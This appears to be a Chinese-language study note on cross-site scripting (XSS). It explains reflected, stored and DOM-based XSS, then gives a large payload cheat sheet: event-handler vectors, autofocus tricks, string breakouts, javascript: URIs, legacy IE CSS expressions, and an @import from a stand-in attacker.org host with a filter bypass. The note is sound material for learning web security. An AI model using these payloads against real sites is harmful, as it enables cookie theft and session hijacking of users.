通过巧妙的方法注入恶意指令代码到网页，使用户加载并执行攻击者恶意制造的网页程序。这些恶意网页程序通常是JavaScript，但实际上也可以包括Java，VBScript，ActiveX，Flash或者甚至是普通的HTML。攻击成功后，攻击者可能得到==更高的权限==（如执行一些操作）、==私密网页内容==、==会话和cookie==等各种内容。

onload：当文档加载完成后运行 JavaScript 脚本

onerror：如果在加载图片时发生错误则执行 JavaScript

autofocus：在页面加载时自动获得焦点

onfocus：当输入域获得焦点时运行脚本

onblur ：在元素失去焦点时触发。

ontoggle：当 元素在打开或关闭时执行 JavaScript

onscroll：滚动元素的滚动条时运行的脚本

onclick: 点击时触发

onchange：当用户改变input输入框内容时执行一段Javascript代码

onmouseover：鼠标指针移动到元素上后执行一段Javascript代码

当HTML页面有多个元素时，可以通过accesskey属性指定激活该元素的快捷键，这样用户通过键盘快捷键就可以激活对应的HTML元素。

payload

?‘accesskey=‘x’onclick=‘alert(1)

?%27accesskey=%27x%27onclick=%27alert(1)

要在自己身上触发漏洞利用，请按以下组合键之一：

在Windows上：ALT + SHIFT + X 在Mac操作系统上：CTRL + ALT + X 在Linux上：Alt + X

https://blog.csdn.net/qq_29277155/article/details/51320064

https://xz.aliyun.com/t/4067#toc-21

如果XSS上下文在一个带引号的字符串文字中，通常可以==跳出字符串直接执行JavaScript==。必须按照XSS上下文修复脚本，因为其中的任何语法错误都将阻止整个脚本执行。

以下是一些拆分字符串文字的有用方法：

‘-alert(document.domain)-’

‘;alert(document.domain)//

常用攻击手段

1.盗用cookie，获取敏感信息。
2.利用植入Flash，通过crossdomain权限设置进一步获取更高权限；或者利用Java等得到类似的操作。
3.利用iframe、frame、XMLHttpRequest或上述Flash等方式，以（被攻击）用户的身份执行一些管理动作，或执行一些一般的操作如发微博、加好友、发私信等操作。
4.利用可被攻击的域受到其他域信任的特点，以受信任来源的身份请求一些平时不允许的操作，如进行不当的投票活动。
5.在访问量极大的一些页面上的XSS可以攻击一些小型网站，实现DDOS攻击的效果。

反射型

无法持久化存储，只能诱惑别人点你构造好的链接

反射型跨站脚本（Reflected Cross-Site Scripting）是最常见，也是使用最广的一种，可将恶意脚本附加到 URL 地址的参数中。
反射型 XSS 的利用一般是攻击者通过特定手法（如电子邮件），诱使用户去访问一个包含恶意代码的 URL，当受害者点击这些专门设计的链接的时候，恶意代码会直接在受害者主机上的浏览器执行。此类 XSS 通常出现在网站的搜索栏、用户登录口等地方，常用来窃取客户端 Cookies 或进行钓鱼欺骗。

存储型

持久化存储到服务器数据库里，谁访问到谁就中招

持久型跨站脚本（Persistent Cross-Site Scripting）也等同于存储型跨站脚本（Stored Cross-Site Scripting）。
此类 XSS 不需要用户单击特定 URL 就能执行跨站脚本，攻击者事先将恶意代码上传或储存到漏洞服务器中，只要受害者浏览包含此恶意代码的页面就会执行恶意代码。持久型 XSS 一般出现在网站留言、评论、博客日志等交互处，恶意脚本存储到客户端或者服务端的数据库中。

DOM型

反射性也是要走后端的，DOM型是纯前端

传统的 XSS 漏洞一般出现在服务器端代码中，而 DOM-Based XSS 是基于 DOM 文档对象模型的一种漏洞，所以，受客户端浏览器的脚本代码所影响。客户端 JavaScript 可以访问浏览器的 DOM 文本对象模型，因此能够决定用于加载当前页面的 URL。换句话说，客户端的脚本程序可以通过 DOM 动态地检查和修改页面内容，它不依赖于服务器端的数据，而从客户端获得 DOM 中的数据（如从 URL 中提取数据）并在本地执行。另一方面，浏览器用户可以操纵 DOM 中的一些对象，例如 URL、location 等。用户在客户端输入的数据如果包含了恶意 JavaScript 脚本，而这些脚本没有经过适当的过滤和消毒，那么应用程序就可能受到基于 DOM 的 XSS 攻击。

无任何过滤情况下

<scirpt>

<scirpt>alert("xss");</script>

<img>

<img src=1 onerror=alert("xss");>

<input>

<input onfocus="alert('xss');">

竞争焦点，从而触发onblur事件
<input onblur=alert("xss") autofocus><input autofocus>

通过autofocus属性执行本身的focus事件，这个向量是使焦点自动跳到输入元素上,触发焦点事件，无需用户去触发
<input onfocus="alert('xss');" autofocus>

<details>

<details ontoggle="alert('xss');">

使用open属性触发ontoggle事件，无需用户去触发
<details open ontoggle="alert('xss');">

<svg>

<svg onload=alert("xss");>

<select>

<select onfocus=alert(1)></select>

通过autofocus属性执行本身的focus事件，这个向量是使焦点自动跳到输入元素上,触发焦点事件，无需用户去触发
<select onfocus=alert(1) autofocus>

<iframe>

<iframe onload=alert("xss");></iframe>

<video>

<video><source onerror="alert(1)">

<audio>

<audio src=x  onerror=alert("xss");>

<body>

<body/onload=alert("xss");>

利用换行符以及autofocus，自动去触发onscroll事件，无需用户去触发

<body
onscroll=alert("xss");><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><input autofocus>

<textarea>

<textarea onfocus=alert("xss"); autofocus>

<keygen>

<keygen autofocus onfocus=alert(1)> //仅限火狐

<marquee>

<marquee onstart=alert("xss")></marquee> //Chrome不行，火狐和IE都可以

<isindex>

<isindex type=image src=1 onerror=alert("xss")>//仅限于IE

利用link远程包含js文件

PS：在无CSP的情况下才可以

<link rel=import href="http://127.0.0.1/1.js">

javascript伪协议

<a>标签

<a href="javascript:alert(`xss`);">xss</a>

<iframe>标签

<iframe src=javascript:alert('xss');></iframe>

<img>标签

<img src=javascript:alert('xss')>//IE7以下

<form>标签

<form action="Javascript:alert(1)"><input type=submit>

其它

expression属性

<img style="xss:expression(alert('xss''))"> // IE7以下
<div style="color:rgb(''�x:expression(alert(1))"></div> //IE7以下
<style>#test{x:expression(alert(/XSS/))}</style> // IE7以下

background属性

<table background=javascript:alert(1)></table> //在Opera 10.5和IE6上有效

CSS import IE 浏览器支持在 CSS 中扩展 JavaScript，这种技术称为动态特性(dynamic properties)。允许攻击者加载一个外部 CSS 样式表是相当危险的，因为攻击者现在可以在原始页面中执行 JavaScript 代码了。

<style>
@import url("http://attacker.org/malicious.css");
</style>

malicious.css：

body {
    color: expression(alert('XSS'));
}

为了绕过对 @import 的过滤，可以在 CSS 中使用反斜杠进行绕过：

<style>
@imp\ort url("http://attacker.org/malicious.css");
</style>

IE 浏览器会接受反斜杠，但是我们绕过了过滤器。

防护

XSS防护

如果将以下符号实体编码，基本就会杜绝xss隐患

< > ’ "